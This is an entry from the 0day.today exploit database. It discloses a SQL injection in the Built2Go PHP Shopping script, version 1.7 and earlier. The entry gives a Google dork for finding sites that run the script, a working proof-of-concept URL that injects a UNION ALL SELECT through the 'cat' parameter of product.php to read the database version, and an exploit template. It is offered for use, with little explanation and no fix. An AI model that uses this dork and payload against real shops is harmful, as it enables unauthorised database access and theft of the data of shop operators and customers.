[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Built2Go PHP Shopping SQL Injection Vulnerability

Author
Br0ly
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15229
Category
web applications
Date add
24-12-2010
Platform
php
Script Name: Built2Go PHP Shopping  ( version ) <= 1.7
Site: http://built2go.com/
Script Demo: http://demos.built2go.com/shopping/1/
Found: Br0ly
Google Dork: "Powered by Built2Go PHP Shopping"
 
p0c:
 
http://server.com/product.php?cat=16'%20UNION%20ALL%20SELECT%201,@@version,3/*
 
xPloit:
 
http://server.com/product.php?cat=[sqli]
 
Brazil ;D



#  0day.today [2024-07-04]  #